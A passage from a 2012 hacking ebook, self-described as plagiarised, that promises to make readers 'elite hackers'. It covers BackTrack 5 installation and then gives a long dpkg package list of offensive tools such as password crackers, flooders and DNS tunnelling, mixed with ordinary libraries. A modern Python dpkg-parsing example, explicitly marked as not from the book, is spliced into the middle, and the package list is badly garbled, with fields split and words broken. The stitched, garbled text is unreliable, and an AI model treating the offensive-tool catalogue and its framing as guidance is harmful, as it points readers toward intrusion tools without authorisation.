
Comprehensive:

Journey of a Hacker
2012
Vol-(I)
From Intermediate Hacker To Elite Hacker.
By
Scryptaxxeler
A guide for those who want to be an Elite but
can't get the right direction.

Disclaimer:
This is a work of pure plagiarism. It will be
difficult to give references to all those from
whose works I am going to plagiarize.
However, some parts will be my own work, and
anyone can copy and distribute it as is.
This will give an insight into the dark world of
hackers, which will include much info
regarding breaking and breaching of cyber
crime laws.
This is not to be used for illegal purposes,
but is intended to let common people and
System Administrators know where the
weakest link lies.
Remember, a chain is only as strong as its
weakest link.

About:
This book is intended to provide information on
how to become an elite hacker.
It's much more than the CEH courses that are
provided for script kiddies.

Brief overviews of the included topics are:

Volume 1 is the Intermediate Level Hacker's
book on hacking, which includes:
Metasploit Framework
Burp Suite, W3AF Framework, etc.
How bank accounts are hacked.
Social Engineering Toolkit
Volume 2 is the level where the hacker
doesn't rely on exploitation tools but writes
them himself, which includes:
Sandbox Evasions.
Programming skills for a Hacker.
Reversing to the Level of Assembly.
Heap Spraying, Use after Free, Stack Overflow.
Deciphering the cookie and much more.

PART-I
The Hacker's Framework
Chapter 1: Setting up a Pentest Edition of Linux.
Chapter 2: The Metasploit Framework
Chapter 3: Web Security: The Burp Suite and W3AF
Chapter 4: Social Engineering Tools

Chapter 1:
Setting up a Penetration Testing
Edition of Linux.
This chapter is intended to introduce a penetration testing distribution
of Linux. I will be discussing the details of BackTrack 5, but you
can also check NodeZero and Ubuntu Pentest Edition.
Let's begin then.
Backtrack:

BackTrack is intended for all audiences from the most savvy security
professionals to early newcomers to the information security field. BackTrack
promotes a quick and easy way to find and update the largest database of
security tools collection to date. Our community of users ranges from skilled
penetration testers in the information security field, government entities,
information technology, security enthusiasts, and individuals new to the
security community.
Feedback from all industries and skill levels allows us to truly develop a
solution that is tailored towards everyone and far exceeds anything ever
developed both commercially and freely available. The project is funded
by Offensive Security. Whether you're hacking wireless, exploiting servers,
performing a web application assessment, learning, or social-engineering a
client, BackTrack is the one-stop-shop for all of your security needs.

BackTrack Clean Hard Drive Install

This method of installation is the simplest available. The assumption is that the whole
hard drive is going to be used for BackTrack.

1. Boot BackTrack on the machine to be installed. Once booted, type in startx to get
   to the KDE graphical interface.
2. Double click the install.sh script on the desktop, or run the command ubiquity in
   a console.
3. Select your geographical location and click Forward. Same for the keyboard layout.
4. The next screen allows you to configure the partitioning layout. The assumption is
   that we are deleting the whole drive and installing BackTrack on it.
5. Accept the installation summary and click Install. Allow the installation to run and
   complete. Restart when done.
6. Log into BackTrack with the default username and password root / toor. Change the
   root password.
7. Fix the framebuffer splash by typing fix-splash (or fix-splash800 if you wish an
   800x600 framebuffer), then reboot.

BackTrack Dual Boot Install with Windows (Tested on Win 7)


This method of installation is the simplest available. The assumption is that you
have a Windows installation taking up all the space on your drive, and you would like to
resize and repartition your drive to allow a BackTrack install alongside your Windows.
BACK UP YOUR WINDOWS INSTALLATION FIRST.

1. Boot BackTrack on the machine to be installed. Once booted, type in startx to get
   to the KDE graphical interface.
2. Double click the install.sh script on the desktop, or run the command ubiquity in
   a console.
3. Select your geographical location and click Forward. Same for the keyboard layout.
4. The next screen allows you to configure the partitioning layout. The assumption is
   that we are resizing the Windows 7 partition and installing BackTrack on the newly
   made space.
5. Accept the installation summary and click Install. Allow the installation to run and
   complete. Restart when done.
6. GRUB should allow you to boot both into BackTrack and Windows.
7. Log into BackTrack with the default username and password root / toor. Change the
   root password.
8. Fix the framebuffer splash by typing fix-splash (or fix-splash800 if you wish an
   800x600 framebuffer), then reboot.

BackTrack Live USB Install


This method of getting a live install onto a USB drive is the simplest available, using
Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB drive (minimum USB drive capacity 2 GB).
2. Format the USB drive to FAT32.
3. Download Unetbootin from http://unetbootin.sourceforge.net/
4. Start Unetbootin and select Diskimage (use the backtrack-final ISO).
5. Select your USB drive and click OK to create a bootable BackTrack USB drive.
6. Log into BackTrack with the default username and password root / toor.

Install BackTrack in VMware.

1. Follow the basic install instructions above to get BackTrack installed in a VMware
   machine.
2. Log into BackTrack. To install the VMware drivers, the kernel source and headers
   need to be in place. By default in the BackTrack 4 final release, the kernel (denoted by
   {version}) is configured and ready. However, in some cases you might need to make
   sure you have the latest kernel sources by typing in:

   apt-get update
   apt-get install linux-source
   cd /usr/src
   tar jxpf linux-source-{version}.tar.bz2
   ln -s linux-source-{version} linux
   cd linux
   zcat /proc/config.gz > .config
   make scripts
   make prepare

3. Now that your kernel sources and headers are in place, run "Install VMware Tools"
   for the specific guest VM.
4. Mount the VMware Tools virtual CD, copy over the VMware Tools package and run the
   installer:

   mount /dev/cdrom3 /mnt/cdrom
   cp /mnt/cdrom/VMwareTools-{version}.tar.gz /tmp/
   cd /tmp/
   tar zxpf VMwareTools-{version}.tar.gz
   cd vmware-tools-distrib
   ./vmware-install.pl

5. Complete the VMware Tools installation as required. Run fix-splash to reintroduce
   the green framebuffer console. Reboot.

Flicked From: Backtrack Official Site.

Well, installation done. Let's have some understanding of what it
offers:
This will give you the location of the Network Exploitation Tools in
BackTrack 5 (for new users).

As you can see, BackTrack has already grouped the essential tools
for you.

See the other screenshot:

It would take 1000 pages if I gave screenshots for all the tools in
BackTrack. The better option is that I give you the list and you can use Google
to find out about the tools. Ain't that cool?
The list you are going to see will blow your head off. I intended to
include this for reference purposes. You can skip the list to around
the 100th page. The best way to learn about the tools is to use a search
engine, which will give you the best access for gaining more
knowledge of the tool.
Thanks to ZitsTif for the list that he has uploaded to his site.

#############################NOTE##########################################
Date: Fri Jul 15 16:42:13 EDT 2011
Version: Backtrack 5 - gnome - 32bit
A tool I installed that doesn't come with Backtrack 5 by default:
sysv-rc-conf
Command I ran before running dpkg --list > toolslist.txt
sudo apt-get update && sudo apt-get upgrade -y && sudo msfupdate
I also installed VirtualBox Guest Host Additions.
############################################################################
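As an added example (not code from the book or from ZitsTif's list), here is a small Python parser for the `dpkg --list` format the list above was produced from. It picks out the BackTrack-packaged tools (versions with a -btN suffix) and diffs two listings of the same box, so a tool that vanished or changed version after `apt-get upgrade` / `msfupdate` is noticed before an engagement rather than during one. The sample listings are constructed: the first reuses a few entries from the page's own list, the second pretends an upgrade has run (its changed versions and the sysv-rc-conf entry are made up).

```python
"""Inventory BackTrack tools from `dpkg --list` output.

Added example, not from the book or from ZitsTif's list. Both sample
listings below are constructed for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Packages rebuilt by the BackTrack team carry a "-btN" revision suffix
# (1.0-bt4, 3.7.0-bt1); stock Ubuntu packages do not.
BT_VERSION_RE = re.compile(r"-bt\d+$")


@dataclass(frozen=True)
class Package:
    status: str        # dpkg status flags: "ii" installed, "rc" removed
    name: str
    version: str
    description: str

    @property
    def installed(self) -> bool:
        # First flag = desired state (i = install), second = actual state
        # (i = installed). "rc" = removed, only config files left behind.
        return self.status.startswith("ii")

    @property
    def from_backtrack(self) -> bool:
        return BT_VERSION_RE.search(self.version) is not None


def parse_dpkg_list(text: str) -> list[Package]:
    """Parse `dpkg --list` output into Package records.

    Record lines are "<flags> <name> <version> <description...>". The legend
    lines at the top start with "Desired=", "|", "||/" or "+++-", so any
    line whose first field is not purely letters is skipped; a listing
    copied without its header therefore parses just as well.
    """
    packages: list[Package] = []
    for line in text.splitlines():
        fields = line.split(None, 3)
        if len(fields) < 3 or not fields[0].isalpha():
            continue
        status, name, version = fields[:3]
        description = fields[3] if len(fields) == 4 else ""
        packages.append(Package(status, name, version, description))
    return packages


def backtrack_tools(packages: list[Package]) -> list[Package]:
    """Installed packages that came from BackTrack, sorted by name."""
    return sorted((p for p in packages if p.installed and p.from_backtrack),
                  key=lambda p: p.name)


def diff_inventories(baseline: list[Package], current: list[Package]):
    """Return (added, removed, changed) package names, installed ones only.

    Compare a listing saved right after install with one taken after an
    update to see which tools appeared, vanished or changed version.
    """
    old = {p.name: p.version for p in baseline if p.installed}
    new = {p.name: p.version for p in current if p.installed}
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(n for n in set(old) & set(new) if old[n] != new[n])
    return added, removed, changed


# Constructed listing; the entries reuse names/versions from the page's list.
SAMPLE_LISTING = """\
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name          Version                 Description
+++-=============-=======================-=================================
ii  0trace        1.0-bt4                 0trace is a traceroute tool that can be run within an existing, open TCP connection
ii  3proxy        0.6.1-bt2               3APA3A 3proxy tiny proxy server
ii  adduser       3.112ubuntu1            add and remove users and groups
rc  apparmor      2.5.1-0ubuntu0.10.04.3  User-space parser utility for AppArmor
ii  aircrack-ng   1.1-bt9                 Aircrack-ng wireless exploitation and enumeration suite
ii  framework3    3.7.0-bt1               Metasploit Exploitation Framework
"""

# Constructed "after upgrade" listing (no header): aircrack-ng gone,
# framework3 at a made-up newer version, sysv-rc-conf installed by hand.
SAMPLE_AFTER_UPDATE = """\
ii  0trace        1.0-bt4                 0trace is a traceroute tool
ii  3proxy        0.6.1-bt2               3APA3A 3proxy tiny proxy server
ii  adduser       3.112ubuntu1            add and remove users and groups
rc  apparmor      2.5.1-0ubuntu0.10.04.3  User-space parser utility for AppArmor
ii  framework3    3.7.1-bt0               Metasploit Exploitation Framework
ii  sysv-rc-conf  0.0-constructed         constructed entry: runlevel editor
"""

if __name__ == "__main__":
    before = parse_dpkg_list(SAMPLE_LISTING)
    for pkg in backtrack_tools(before):
        print(f"{pkg.name:<14}{pkg.version:<12}{pkg.description[:50]}")
    added, removed, changed = diff_inventories(
        before, parse_dpkg_list(SAMPLE_AFTER_UPDATE))
    print("added:", added, "removed:", removed, "changed:", changed)
```

On a real box, feed it `dpkg --list` output saved to a file, as ZitsTif did with toolslist.txt, and keep that first file as the baseline.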

ii gvfs-backends
userspace virtual filesystem - backends

1.6.1-0ubuntu1build1

ii gzip
GNU compression utilities

1.3.12-9ubuntu1.1

ii hack-library
1.0-bt2
A collection of tools used for SIP attack tools.
ii hashcat
cpu based multihash cracker

0.36-bt4

ii hashcat-utils
0.3-bt3
Utilities for creating and manipulation wordlists
ii hdparm
9.15-1ubuntu9
tune hard disk parameters for high performance
ii hexedit
1.2.12-bt0
View and edit files in hexadecimal or in ASC
II.
ii hexinject
1.2-bt1
HexInject is a very versatile packet injector and sniffer, that provide a
command-line framework for raw network access.
ii hicolor-icon-theme
0.11-1
default fallback theme for FreeDesktop.org icon themes
ii honeycomb
0.7-bt6
Automated signature creation using honeypots.
ii honeyd
1.5c-bt3
Honeyd is a small daemon that creates virtual hosts on a network.
ii hostname
3.03ubuntu1
utility to set/show the host name or domain name
ii hpijs
3.10.2-2ubuntu2.2
HP Linux Printing and Imaging - gs IJS driver (hpijs)
ii hping2
2.0.0-rc3-bt2
hping is a command-line oriented TCP/IP packet assembler/analyzer.
ii hping3
20051105-bt2
hping is a command-line oriented TCP/IP packet assembler/analyzer. The
interface is inspired to the ping(8) unix command, but hping isn't only able
to sen
ii

httprint

301-bt2

httprint is a web server fingerprinting tool. It relies on web server


characteristics to accurately identify web servers, despite the fact that they
may h
ii humanity-icon-theme
Humanity Icon theme

0.5.2.1

ii hunspell-en-us
20070829-4ubuntu1
English_american dictionary for hunspell
ii hydra
6.3-bt6
A very fast network logon cracker which support many different services.
ii iaxflood
1.0-bt0
A UDP Inter-Asterisk_eXchange (i.e. IAX)
ii icedtea-6-jre-cacao
6b20-1.9.7-0ubuntu1~10.04.1
Alternative JVM for OpenJDK, using Cacao
ii icoutils
0.29.1-0ubuntu1~lucid
Create and extract MS Windows icons and cursors
ii ida-pro-free
5.0-bt3
The IDA Pro Disassembler and Debugger is an interactive, programmable,
extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS
X.
ii ifupdown
0.6.8ubuntu29.2
high level tools to configure network interfaces
ii
iisemulator
Emulation for the
IIS web server

0.95-3

ii ike-scan
1.9-bt2
ike-scan is a command-line tool that uses the IKE protocol to discover,
fingerprint and test IPsec VPN servers.
ii imagemagick
image manipulation programs

7:6.5.7.8-1ubuntu1.1

ii impacket-examples
0.9.6.0-bt1
A collection of Python classes focused on providing access to network packets.
ii indicator-applet
GNOME panel indicator applet

0.3.7-0ubuntu1

ii indicator-application
Application Indicators

0.0.19-0ubuntu4

ii indicator-messages
0.3.6-0ubuntu2
GNOME panel indicator applet for messages

ii indicator-sound
A system sound indicator.

0.2.6-0ubuntu1

ii info
4.13a.dfsg.1-5ubuntu1
Standalone GNU Info documentation browser
ii initramfs-tools
tools for generating an initramfs

0.92bubuntu78

ii initramfs-tools-bin
binaries used by initramfs-tools

0.92bubuntu78

ii initscripts
2.87dsf-4ubuntu17.2
scripts for initializing and shutting down the system
ii insserv
1.12.0-14
Tool to organize boot sequence using LSB init.d script dependencies
ii install-info
4.13a.dfsg.1-5ubuntu1
Manage installed documentation in info format
ii installation-report
system installation report

2.39ubuntu4

ii intel-gpu-tools
1.0.2+git20100324-0ubuntu1
tools for debugging the Intel graphics driver
ii intltool
0.41.0-0ubuntu1
Utility scripts for internationalizing XML
ii intltool-debian
0.35.0+20060710.1
Help i18n of RFC822 compliant config files
ii inviteflood
2.0-bt1
Command line tool to attempt to flood a specific destination.
ii iodine
0.6.0-rc1-bt2
This is a piece of software that lets you tunnel IPv4 data through a DNS
server. This can be usable in different situations where internet access is
firew
ii ipcalc
IPv4 Calculator

0.41-bt1

ii iproute
networking and traffic control tools

20091226-1

ii iptables
1.4.4-2ubuntu2
administration tools for packet filtering and NAT
ii iputils-ping
3:20071127-2ubuntu1
Tools to test the reachability of network hosts

ii iputils-tracepath
3:20071127-2ubuntu1
Tools to trace the network path to a remote host
ii irb
Interactive Ruby (irb)

4.2-2~uorppa0

ii irb1.8
Interactive Ruby (for Ruby 1.8)

1.8.7.249-2

ii irb1.9.2
Interactive Ruby (for Ruby 1.9.2)

1.9.2.z1-1ppa1~lucid

ii irpas
0.10-bt1
The idea is to implement small tools which can be scripted for larger tests
while using the protocols describd in standards or white papers. IRPAS is not
ii irqbalance
0.55+20091017-3ubuntu2
Daemon to balance interrupts for SMP systems
ii iso-codes
3.12.1-1
ISO language, territory, currency, script codes and their translations
ii iw
0.9.22-bt2
iw is a new nl80211 based CLI configuration utility for wireless devices.
ii iwar
0.08-bt1
iWar is a "war dialer" written completely in C for Unix types of operating
systems (Linux, FreeBSD, OpenBSD, etc). It is intended for legal phone
security
ii java-common
Base of all Java packages

0.34

ii john
1.7.6-jumbo-12-bt5
John the Ripper is a fast password cracker. Besides several crypt(3) password
hash types most commonly found on various Unix flavors, supported out of the
ii joomscan
0.0.4-bt2
Detects file inclusion, sql injection, command execution vulnerabilities of a
target Joomla! web site.
ii kbd
1.15-1ubuntu3
Linux console font and keytable utilities
ii keepnote
0.7.1-bt0
A note taking and organization application.
ii kernel-package
12.032
A utility for building Linux kernel related Debian packages.
ii keyutils
Linux Key Management Utilities

1.2-12

ii kismet
201103r2-bt1
An 802.11 layer2 wireless network detector, sniffer, and intrusion detection
system.
ii klibc-utils
1.5.17-4ubuntu1
small utilities built with klibc for early boot
ii lame
An MP3 encoding library (frontend)

3.98.2+debian-0ubuntu3

ii landscape-common
11.02-0ubuntu0.10.04.1
The Landscape administration system client
ii language-pack-en
1:10.04+20110204
translation updates for language English
ii language-pack-en-base
translations for language English

1:10.04+20110204

ii language-selector-common
Language selector for Ubuntu Linux

0.5.8

ii lanmap2
1.0-bt1
Builds database/visualizations of LAN structure from passively sifted
information.
ii laptop-detect
attempt to detect a laptop

0.13.7ubuntu2

ii launchpad-integration
launchpad integration

0.1.35

ii lbd
0.2-bt2
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP
Load-Balancing.
ii less
pager program similar to more

436-1

ii libaa1
asc
ii art library

1.4p5-38build1

ii libaccess-bridge-java
Java Access Bridge for GNOME

1.26.2-3

ii libaccess-bridge-java-jni
1.26.2-3
Java Access Bridge for GNOME (jni bindings)
ii libacl1
Access control list shared library

2.2.49-2

ii libamd2.2.0
1:3.4.0-1ubuntu3
approximate minimum degree ordering library for sparse matrices
ii libao2
Cross Platform Audio Output Library

0.8.8-5ubuntu2

ii libapache2-mod-php5
5.3.2-1ubuntu4.9
server-side, HTML-embedded scripting language (Apache 2 module)
ii libapparmor-perl
AppArmor library Perl bindings

2.5.1-0ubuntu0.10.04.3

ii libapparmor1
changehat AppArmor library

2.5.1-0ubuntu0.10.04.3

ii libappindicator0
Application Indicators

0.0.19-0ubuntu4

ii libapr1
The Apache Portable Runtime Library

1.3.8-1build1

ii libaprutil1
1.3.9+dfsg-3ubuntu0.10.04.1
The Apache Portable Runtime Utility Library
ii libaprutil1-dbd-sqlite3
1.3.9+dfsg-3ubuntu0.10.04.1
The Apache Portable Runtime Utility Library - SQLite3 Driver
ii libaprutil1-ldap
1.3.9+dfsg-3ubuntu0.10.04.1
The Apache Portable Runtime Utility Library - LDAP Driver
ii libarchive1
2.8.0-2
Single library to read/write tar, cpio, pax, zip, iso9660, etc.
ii libart-2.0-2
2.3.20-2build1
Library of functions for 2D graphics - runtime files
ii libasound2
shared library for ALSA applications

1.0.22-0ubuntu7

ii libasound2-dev
1.0.22-0ubuntu7
shared library for ALSA applications -- development files
ii libasound2-plugins
ALSA library additional plugins

1.0.22-0ubuntu6

ii libaspell15
0.60.6-3ubuntu1
GNU Aspell spell-checker runtime library
ii libast2
the Library of Assorted Spiffy Things

0.7-3

ii libatasmart4
0.17+git20100219-1git2
ATA S.M.A.R.T. reading and parsing library

ii libatk1.0-0
The ATK accessibility toolkit

1.30.0-0ubuntu2.1

ii libatk1.0-data
1.30.0-0ubuntu2.1
Common files for the ATK accessibility toolkit
ii libatm1
1:2.5.1-1.2
shared library for ATM (Asynchronous Transfer Mode)
ii libatspi1.0-0
1.30.1-0ubuntu1
C binding libraries of at-spi for GNOME Accessibility
ii libattr1
Extended attribute shared library

1:2.4.44-1

ii libaudio2
Network Audio System - shared libraries

1.9.2-3

ii libaudiofile0
0.2.6-8ubuntu1
Open-source version of SGI's audiofile library
ii libavahi-client3
Avahi client library

0.6.25-1ubuntu6.2

ii libavahi-common-data
Avahi common data files

0.6.25-1ubuntu6.2

ii libavahi-common3
Avahi common library

0.6.25-1ubuntu6.2

ii libavahi-compat-libdnssd1
0.6.25-1ubuntu6.2
Avahi Apple Bonjour compatibility library
ii libavahi-core6
Avahi's embeddable mDNS/DNS-SD library

0.6.25-1ubuntu6.2

ii libavahi-glib1
Avahi glib integration library

0.6.25-1ubuntu6.2

ii libavc1394-0
control IEEE 1394 audio/video devices

0.5.3-1build4

ii libavcodec52
ffmpeg codec library

4:0.5.1-1ubuntu1.1

ii libavformat52
ffmpeg file format library

4:0.5.1-1ubuntu1.1

ii libavutil49
ffmpeg utility library

4:0.5.1-1ubuntu1.1

ii libbfb0
bfb protocol library

0.23-1

ii libbind9-60
BIND9 Shared Library used by BIND

1:9.7.0.dfsg.P1-1ubuntu0.1

ii libblas3gf
1.2-2build1
Basic Linear Algebra Subroutines 3, shared library
ii libblkid1
block device id library

2.17.2-0ubuntu1.10.04.2

ii libbluetooth3
4.60-0ubuntu8
Library to use the BlueZ Linux Bluetooth stack
ii libbonobo2-0
Bonobo CORBA interfaces library

2.24.3-0ubuntu1

ii libbonobo2-common
2.24.3-0ubuntu1
Bonobo CORBA interfaces library -- support files
ii libbonoboui2-0
The Bonobo UI library

2.24.3-0ubuntu1

ii libbonoboui2-common
The Bonobo UI library -- common files

2.24.3-0ubuntu1

ii libboost-filesystem1.40.0
1.40.0-4ubuntu4
filesystem operations (portable paths, iteration over directories, etc) in C++
ii libboost-python1.40.0
Boost.Python Library

1.40.0-4ubuntu4

ii libboost-regex1.40.0
regular expression library for C++

1.40.0-4ubuntu4

ii libboost-system1.40.0
1.40.0-4ubuntu4
Operating system (e.g. diagnostics support) library
ii libboost-thread1.40.0
portable C++ multi-threading

1.40.0-4ubuntu4

ii libbsd0
0.2.0-1
utility functions from BSD systems - shared library
ii libbz2-1.0
1.0.5-4ubuntu0.1
high-quality block-sorting file compressor library - runtime
ii libc-ares2
library for asyncronous name resolves

1.7.0-1

ii libc-bin
Embedded GNU C Library: Binaries

2.11.1-0ubuntu7.8

ii libc-dev-bin
2.11.1-0ubuntu7.8
Embedded GNU C Library: Development binaries

ii libc6
2.11.1-0ubuntu7.8
Embedded GNU C Library: Shared libraries
ii libc6-dev
2.11.1-0ubuntu7.8
Embedded GNU C Library: Development Libraries and Header Files
ii libc6-i686
2.11.1-0ubuntu7.8
GNU C Library: Shared libraries [i686 optimized]
ii libcaca0
colour ASC
II art library

0.99.beta16-3

ii libcairo2
The Cairo 2D vector graphics library

1.8.10-2ubuntu1

ii libcairomm-1.0-1
1.8.4-0ubuntu1
C++ wrappers for Cairo (shared libraries)
ii libcamel1.2-14
2.28.3.1-0ubuntu6
The Evolution MIME message handling library
ii libcanberra-gtk-module
0.22-1ubuntu2
translates Gtk+ widgets signals to event sounds
ii libcanberra-gtk0
0.22-1ubuntu2
Gtk+ helper for playing widget event sounds with libcanberra
ii libcanberra0
0.22-1ubuntu2
a simple abstract interface for playing event sounds
ii libcap-ng0
An alternate posix capabilities library

0.6.2-4

ii libcap2
1:2.17-2ubuntu1
support for getting/setting POSIX.1e capabilities
ii libcap2-bin
1:2.17-2ubuntu1
basic utility programs for using capabilities
ii libccid
1.3.11-1
PC/SC driver for USB CCID smart card readers
ii libcdio-cdda0
0.81-4
library to read and control digital audio CDs
ii libcdio-paranoia0
0.81-4
library to read digital audio CDs with error correction
ii libcdio10
library to read and control CD-ROM

0.81-4

ii libcdparanoia0
3.10.2+debian-9
audio extraction tool for sampling CDs (library)
ii libck-connector0
ConsoleKit libraries

0.4.1-3ubuntu2

ii libclass-accessor-perl
0.34-1
Perl module that automatically generates accessors
ii libclutter-1.0-0
1.2.4-0ubuntu1
Open GL based interactive canvas library
ii libcomerr2
common error description library

1.41.11-1ubuntu2.1

ii libcroco3
0.6.2-1
a generic Cascading Style Sheet (CSS) parsing and manipulation toolkit
ii libcups2
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - Core library
ii libcupscgi1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - CGI library
ii libcupsdriver1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - Driver library
ii libcupsimage2
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - Raster image library
ii libcupsmime1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - MIME library
ii libcupsppdc1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - PPD manipulation library
ii libcurl3
7.19.7-1ubuntu1
Multi-protocol file transfer library (OpenSSL)
ii libcurl3-gnutls
7.19.7-1ubuntu1
Multi-protocol file transfer library (GnuTLS)
ii libcurses-perl
Curses interface for Perl

1.28-1

ii libcurses-ui-perl
0.9607-1
curses-based OO user interface framework for Perl
ii libcwidget3
0.5.13-1ubuntu1
high-level terminal interface library for C++ (runtime files)
ii libdaemon0
0.14-2
lightweight C library for daemons - runtime library

ii libdatrie1
Double-array trie library

0.2.2-3

ii libdb4.6
4.6.21-16
Berkeley v4.6 Database Libraries [runtime]
ii libdb4.8
4.8.24-1ubuntu1
Berkeley v4.8 Database Libraries [runtime]
ii libdbd-mysql-perl
4.012-1ubuntu1
A Perl5 database interface to the MySQL database
ii libdbd-sqlite3-perl
1.29-1
Perl DBI driver with a self-contained RDBMS
ii libdbi-perl
Perl Database Interface (DBI)

1.609-1build1

ii libdbus-1-3
simple interprocess messaging system

1.2.16-2ubuntu4.2

ii libdbus-glib-1-2
0.84-1
simple interprocess messaging system (GLib-based shared library)
ii libdbusmenu-glib1
Menus over DBus shared library for glib

0.2.9-0ubuntu3.1

ii libdbusmenu-gtk1
Menus over DBus shared library for GTK

0.2.9-0ubuntu3.1

ii libdebconfclient0
0.147
Debian Configuration Management System (C-implementation)
ii libdebian-installer4
0.68ubuntu3
Library of common debian-installer functions
ii libdevkit-power-gobject1
1:0.9.1-1
abstraction for power management - shared library (old ABI)
ii libdevmapper1.02.1
2:1.02.39-1ubuntu4.1
The Linux Kernel Device Mapper userspace library
ii libdigest-hmac-perl
1.01-7
create standard message integrity checks
ii libdigest-sha1-perl
NIST SHA-1 message digest algorithm

2.12-1build1

ii libdirectfb-1.2-0
1.2.8-5ubuntu2
direct frame buffer graphics - shared libraries
ii libdiscover2
hardware identification library

2.1.2-3

ii libdjvulibre-text
3.5.22-1ubuntu4.1
Linguistic support files for libdjvulibre
ii libdjvulibre21
3.5.22-1ubuntu4.1
Runtime support for the DjVu image format
ii libdmraid1.0.0.rc16
1.0.0.rc16-3ubuntu2
Device-Mapper Software RAID support tool - shared library
ii libdnet
DECnet Libraries

2.49ubuntu1

ii libdnet-dev
DECnet development libraries & Headers

2.49ubuntu1

ii libdns64
DNS Shared Library used by BIND

1:9.7.0.dfsg.P1-1ubuntu0.1

ii libdrm-intel1
2.4.18-1ubuntu3
Userspace interface to intel-specific kernel DRM services -- runtime
ii libdrm-nouveau1
2.4.18-1ubuntu3
Userspace interface to nouveau-specific kernel DRM services -- runtime
ii libdrm-radeon1
2.4.18-1ubuntu3
Userspace interface to radeon-specific kernel DRM services -- runtime
ii libdrm2
2.4.18-1ubuntu3
Userspace interface to kernel DRM services -- runtime
ii libdumbnet-dev
1.12-3
A dumb, portable networking library -- development files
ii libdumbnet1
1.12-3
A dumb, portable networking library -- shared library
ii libdv4
1.0.0-2ubuntu2
software library for DV format digital video (runtime lib)
ii libebackend1.2-0
2.28.3.1-0ubuntu6
Utility library for evolution data servers
ii libebook1.2-9
2.28.3.1-0ubuntu6
Client library for evolution address books
ii libecal1.2-7
Client library for evolution calendars

2.28.3.1-0ubuntu6

ii libecryptfs0
83-0ubuntu3.1
ecryptfs cryptographic filesystem (library)
ii libedata-book1.2-2
2.28.3.1-0ubuntu6
Backend library for evolution address books

ii libedata-cal1.2-6
Backend library for evolution calendars

2.28.3.1-0ubuntu6

ii libedataserver1.2-11
2.28.3.1-0ubuntu6
Utility library for evolution data servers
ii libedataserverui1.2-8
2.28.3.1-0ubuntu6
GUI utility library for evolution data servers
ii libedit2
BSD editline and history libraries

2.11-20080614-1build1

ii libeggdbus-1-0
D-Bus bindings for GObject

0.6-1

ii libegroupwise1.2-13
2.28.3.1-0ubuntu6
Client library for accessing groupwise POA through SOAP interface
ii libelf1
library to read and write ELF files

0.143-1

ii libenchant1c2a
1.6.0-0ubuntu1
a wrapper library for various spell checker engines
ii libept0
0.5.30
High-level library for managing Debian package information
ii liberror-perl
0.17-1
Perl module for error/exception handling in an OO-ish way
ii libesd0
0.2.41-6ubuntu1
Enlightened Sound Daemon - Shared libraries
ii libestools1.2
Edinburgh Speech Tools Library

1:1.2.96~beta-6

ii libevent-1.4-2
1.4.13-stable-1
An asynchronous event notification library
ii libevent-core-1.4-2
1.4.13-stable-1
An asynchronous event notification library (core)
ii libevent-dev
1.4.13-stable-1
Development libraries, header files and docs for libevent
ii libevent-extra-1.4-2
1.4.13-stable-1
An asynchronous event notification library (extra)
ii libewf1
20100119-1
library with support for Expert Witness Compression Format
ii libexempi3
library to parse XMP metadata (Library)

2.1.1-1build2

ii libexif12
library to parse EXIF files

0.6.19-1

ii libexiv2-6
EXIF/IPTC metadata manipulation library

0.19-1

ii libexpat1
XML parsing C library - runtime library

2.0.1-7ubuntu1

ii libextractor-plugins
0.5.23+dfsg-4build1
extracts meta-data from files of arbitrary type (plugins)
ii libextractor1c2a
0.5.23+dfsg-4build1
extracts meta-data from files of arbitrary type (library)
ii libfbclient2
Firebird client library

2.1.3.18185-0.ds1-6build1

ii libffi5
3.0.9-1
Foreign Function Interface library runtime
ii libfile-copy-recursive-perl
0.38-1
Perl extension for recursively copying files and directories
ii libfile-homedir-perl
0.86-1
Get the home directory for yourself or other users in Perl
ii libfile-which-perl
1.08-1
Perl module for searching paths for executable programs
ii libflac8
1.2.1-2build2
Free Lossless Audio Codec - runtime C library
ii libfont-afm-perl
1.20-1
Font::AFM - Interface to Adobe Font Metrics files
ii libfontconfig1
2.8.0-2ubuntu1
generic font configuration library - runtime
ii libfontenc1
X11 font encoding library

1:1.0.5-1

ii libfreetype6
2.3.11-1ubuntu2.4
FreeType 2 font engine, shared library files
ii libfribidi0
0.19.2-1
Free Implementation of the Unicode BiDi algorithm
ii libfs6
X11 Font Services library

2:1.0.2-1build1

ii libfuse2
Filesystem in USErspace library

2.8.1-1.1ubuntu3.1

ii libgail18
2.20.1-0ubuntu2
GNOME Accessibility Implementation Library -- shared libraries
ii libgamin0
0.1.10-1ubuntu3
Client library for the gamin file and directory monitoring system
ii libgc1c2
1:6.8-1.2ubuntu1
conservative garbage collector for C and C++
ii libgcc1
GCC support library

1:4.4.3-4ubuntu5

ii libgconf2-4
2.28.1-0ubuntu1
GNOME configuration database system (shared libraries)
ii libgcr0
2.92.92.is.2.30.3-0ubuntu1.1
Library for Crypto UI related task - runtime
ii libgcrypt11
LGPL Crypto library - runtime library

1.4.4-5ubuntu2

ii libgd2-noxpm
2.0.36~rc1~dfsg-3.1ubuntu1
GD Graphics Library version 2 (without XPM support)
ii libgdata-google1.2-1
2.28.3.1-0ubuntu6
Client library for accessing Google POA through SOAP interface
ii libgdata1.2-1
2.28.3.1-0ubuntu6
Client library for accessing Google POA through SOAP interface
ii libgdbm3
1.8.3-9
GNU dbm database routines (runtime version)
ii libgdu0
GObject based Disk Utility Library

2.30.1-1

ii libgeoip1
1.4.6.dfsg-17
A non-DNS IP-to-country resolver library
ii libgfortran3
4.4.3-4ubuntu5
Runtime library for GNU Fortran applications
ii libgif-dev
library for GIF images (development)

4.1.6-9

ii libgif4
library for GIF images (library)

4.1.6-9

